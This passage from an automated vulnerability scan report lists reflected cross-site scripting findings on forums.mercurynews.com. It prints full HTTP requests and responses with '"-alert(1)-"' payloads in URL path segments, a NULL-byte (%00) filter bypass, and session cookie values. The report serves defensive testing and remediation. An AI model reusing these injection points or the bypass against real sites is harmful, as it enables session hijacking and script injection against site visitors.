Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:48 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19272

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
e="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forum/news?c9da1"-alert(1)-"992e5590b97=1";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCi
...[SNIP]...

3.61. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/602

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef319"-alert(1)-"7ea175d2fc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forumsef319"-alert(1)-"7ea175d2fc0/forum/602 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:21 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:45 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
nguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forumsef319"-alert(1)-"7ea175d2fc0/forum/602";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campai
...[SNIP]...

3.62. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/602

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00ef166"-alert(1)-"5348053c353 was submitted in the REST URL parameter 2. This input was echoed as ef166"-alert(1)-"5348053c353 in the application's response. Note that the reflected s.prop4 value in the response below still contains the literal sequence %00: the script copies the raw, undecoded request path, and it is the unescaped double quote following the %00 that terminates the string literal.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/forum%00ef166"-alert(1)-"5348053c353/602 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:27 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:06:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
avaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/forum%00ef166"-alert(1)-"5348053c353/602";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=get
...[SNIP]...

3.63. http://forums.mercurynews.com/forums/forum/602 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/602

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0087dba"-alert(1)-"bd7fc6dfef5 was submitted in the REST URL parameter 3. This input was echoed as 87dba"-alert(1)-"bd7fc6dfef5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/forum/602%0087dba"-alert(1)-"bd7fc6dfef5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 02:06:39 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 02:07:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
cript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/forum/602%0087dba"-alert(1)-"bd7fc6dfef5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.64. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/673

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cac3"-alert(1)-"ff2a2ccfa6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forums8cac3"-alert(1)-"ff2a2ccfa6/forum/673 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:12:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=7cf2c41678eb464964f8a0ac1163697f; expires=Wed, 08 Dec 2010 02:46:18 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:13:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
nguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums8cac3"-alert(1)-"ff2a2ccfa6/forum/673";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campai
...[SNIP]...

3.65. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/673

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00f1250"-alert(1)-"6cf71db7b96 was submitted in the REST URL parameter 2. This input was echoed as f1250"-alert(1)-"6cf71db7b96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/forum%00f1250"-alert(1)-"6cf71db7b96/673 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:13:32 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=ec6a4cd6b8b79036be9cc2544a3b80f1; expires=Wed, 08 Dec 2010 02:46:52 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:13:56 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
avaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/forum%00f1250"-alert(1)-"6cf71db7b96/673";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=get
...[SNIP]...

3.66. http://forums.mercurynews.com/forums/forum/673 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/forum/673

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00827f3"-alert(1)-"682449f4fa5 was submitted in the REST URL parameter 3. This input was echoed as 827f3"-alert(1)-"682449f4fa5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/forum/673%00827f3"-alert(1)-"682449f4fa5 HTTP/1.1
Host: forums.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 23:13:58 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS7d37fc218a44afb27b49a326af87a923=96d5ff16ceb4d4857e2b1a534cbdbe8f; expires=Wed, 08 Dec 2010 02:47:18 GMT; path=/; domain=.forums.mercurynews.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 14 Nov 2010 23:14:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21992

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
cript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/forum/673%00827f3"-alert(1)-"682449f4fa5";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQueryString("SOURCE");
   s.eVar4=s.pageName;
   s.campaign=getCiQu
...[SNIP]...

3.67. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55459"-alert(1)-"f8751e5772f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /forums55459"-alert(1)-"f8751e5772f/jrss/forum/602/5?callback=processJsonTopics&js_param1=forum_topics_container HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:13 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
nguage="JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums55459"-alert(1)-"f8751e5772f/jrss/forum/602/5?callback=processJsonTopics&js_param1=forum_topics_container";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";

...[SNIP]...

3.68. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0035e64"-alert(1)-"1c84bda8999 was submitted in the REST URL parameter 2. This input was echoed as 35e64"-alert(1)-"1c84bda8999 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/jrss%0035e64"-alert(1)-"1c84bda8999/forum/602/5?callback=processJsonTopics&js_param1=forum_topics_container HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:22 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:46 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
JavaScript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/jrss%0035e64"-alert(1)-"1c84bda8999/forum/602/5?callback=processJsonTopics&js_param1=forum_topics_container";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eV
...[SNIP]...

3.69. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0054fb5"-alert(1)-"d8ab2187b4c was submitted in the REST URL parameter 3. This input was echoed as 54fb5"-alert(1)-"d8ab2187b4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/jrss/forum%0054fb5"-alert(1)-"d8ab2187b4c/602/5?callback=processJsonTopics&js_param1=forum_topics_container HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:28 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:52 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
ript">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/jrss/forum%0054fb5"-alert(1)-"d8ab2187b4c/602/5?callback=processJsonTopics&js_param1=forum_topics_container";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=ge
...[SNIP]...

3.70. http://forums.mercurynews.com/forums/jrss/forum/602/5 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
Path:   /forums/jrss/forum/602/5

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0031fdf"-alert(1)-"ae07d35c128 was submitted in the REST URL parameter 4. This input was echoed as 31fdf"-alert(1)-"ae07d35c128 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /forums/jrss/forum/602%0031fdf"-alert(1)-"ae07d35c128/5?callback=processJsonTopics&js_param1=forum_topics_container HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/opinion
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: forums.mercurynews.com
Proxy-Connection: Keep-Alive
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507; ZZRDB162,570,21=1; ZZFLSH=29; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63

Response

HTTP/1.1 404 Not Found
Date: Mon, 15 Nov 2010 01:54:34 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 15 Nov 2010 01:54:58 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 22135

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title
...[SNIP]...
">
if (typeof s != 'undefined') {
   s.pageName="";
   s.channel="Forums";
   s.prop1="Home";
   s.prop2=s.prop1 + " / Opinion";
   s.prop3=s.prop2 + " / Forums";
   s.prop4=s.prop3 + " / forums/jrss/forum/602%0031fdf"-alert(1)-"ae07d35c128/5?callback=processJsonTopics&js_param1=forum_topics_container";
   s.prop9=getCiQueryString("SOURCE");
   s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF");
   s.events="event1";
   s.eVar2=getCiQ
...[SNIP]...

3.71. http://forums.mercurynews.com/forums/jrss/forum/602/5 [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://forums.mercurynews.com
